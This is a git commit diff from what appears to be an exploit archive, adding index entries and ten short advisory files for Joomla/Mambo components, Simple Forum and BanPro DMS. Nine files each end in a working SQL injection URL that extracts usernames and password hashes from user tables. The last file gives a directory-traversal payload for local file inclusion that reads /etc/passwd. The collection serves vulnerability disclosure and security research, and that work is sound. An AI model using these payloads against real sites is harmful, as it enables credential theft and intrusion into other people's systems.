Updated 01_28_2014

2014-01-28 04:25:32 +00:00 · 2014-01-28 04:25:32 +00:00 · 345d75ccef
commit 345d75ccef
parent 30233ba6f1
11 changed files with 93 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -28020,3 +28020,13 @@ id,file,description,date,author,platform,type,port
 31205,platforms/windows/dos/31205.txt,"Sami FTP Server 2.0.x Multiple Commands Remote Denial Of Service Vulnerabilities",2008-02-15,Cod3rZ,windows,dos,0
 31206,platforms/php/webapps/31206.txt,"Joomla! and Mambo 'com_smslist' Component 'listid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
 31207,platforms/php/webapps/31207.txt,"Joomla! and Mambo 'com_activities' Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31208,platforms/php/webapps/31208.txt,"Joomla! and Mambo 'com_sg' Component 'pid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31209,platforms/php/webapps/31209.txt,"Joomla! and Mambo faq Component 'catid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31210,platforms/php/webapps/31210.txt,"Yellow Swordfish Simple Forum 1.10/1.11'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31211,platforms/php/webapps/31211.txt,"Yellow Swordfish Simple Forum 1.7/1.9 'index.php' SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31212,platforms/php/webapps/31212.txt,"Yellow Swordfish Simple Forum 1.x 'topic' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31213,platforms/php/webapps/31213.txt,"Joomla! and Mambo 'com_salesrep' Component 'rid' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31214,platforms/php/webapps/31214.txt,"Joomla! and Mambo com_lexikon Component 'id' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0
+31215,platforms/php/webapps/31215.txt,"Joomla! and Mambo com_filebase Component 'filecatid' Parameter SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0
+31216,platforms/php/webapps/31216.txt,"Joomla! and Mambo com_scheduling Component 'id' Parameter SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0
+31217,platforms/php/webapps/31217.txt,"BanPro DMS 1.0 'index.php' Local File Include Vulnerability",2008-02-16,muuratsalo,php,webapps,0
--- a/platforms/php/webapps/31208.txt
+++ b/platforms/php/webapps/31208.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27821/info
+
+The Joomla! and Mambo 'com_sg' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+
+http://www.example.com/index.php?option=com_sg&Itemid=16&task=order&range=3&category=3&pid=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,10,11,0x3a,0x3a,14,15,16/**/from/**/jos_users/*
+
--- a/platforms/php/webapps/31209.txt
+++ b/platforms/php/webapps/31209.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27822/info
+
+The Joomla! and Mambo 'faq' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=faq&task=viewallfaq&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password),0x3a,0/**/from/**/mos_users/* 
--- a/platforms/php/webapps/31210.txt
+++ b/platforms/php/webapps/31210.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27823/info
+
+Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects Simple Forum 1.10 and 1.11; other versions may also be affected. 
+
+http://www.example.com/forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/* 
--- a/platforms/php/webapps/31211.txt
+++ b/platforms/php/webapps/31211.txt
@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/27824/info
+
+Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+This issue affects Simple Forum 1.7 and 1.9; other versions may also be affected.
+
+
+http://www.example.com/index.php?pagename=sf-forum&forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,444,555/**/FROM/**/wp_users/* 
--- a/platforms/php/webapps/31212.txt
+++ b/platforms/php/webapps/31212.txt
@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/27825/info
+
+Simple Forum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/?page_id=xxxx&forum=S@BUN&topic=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),111,222,333,0,0,0,0,0/**/from%2F%2A%2A%2Fwp_users/**where%20id%201%20=%20-1 
--- a/platforms/php/webapps/31213.txt
+++ b/platforms/php/webapps/31213.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27827/info
+
+The Joomla! and Mambo 'com_salesrep' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_salesrep&action=showrep&Itemid=S@BUN&rid=-9999999/**/union/**/select/**/0,concat(username,0x3a,password),0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,
+0x3a/**/from/**/jos_users/* 
--- a/platforms/php/webapps/31214.txt
+++ b/platforms/php/webapps/31214.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27828/info
+
+The Joomla! and Mambo 'com_lexikon' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_lexikon&id=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from/**/mos_u
+sers/* 
--- a/platforms/php/webapps/31215.txt
+++ b/platforms/php/webapps/31215.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27829/info
+
+The Joomla! and Mambo 'com_filebase' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/index.php?option=com_filebase&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(u
+sername,0x3a,password)/**/from/**/mos_users/* 
--- a/platforms/php/webapps/31216.txt
+++ b/platforms/php/webapps/31216.txt
@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/27830/
+
+The Joomla! and Mambo 'com_scheduling' component is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/index.php?option=com_scheduling&Itemid=28&action=viewAbstract&id=-9999999/**/union/**/select/**/0,1,concat(username,0x3a,password),concat(username,0x3a,password),4,5,
+6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/**/from/**/mos_users/* 
--- a/platforms/php/webapps/31217.txt
+++ b/platforms/php/webapps/31217.txt
@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27831/info
+
+BanPro DMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to include local files in the context of the webserver process. This may allow the attacker to obtain potentially sensitive information; other attacks are also possible.
+
+This issue affects BanPro DMS 1.0; other versions may also be vulnerable.
+
+http://www.example.com/DMS/index.php?action=../../../../../../../../../../etc/passwd%00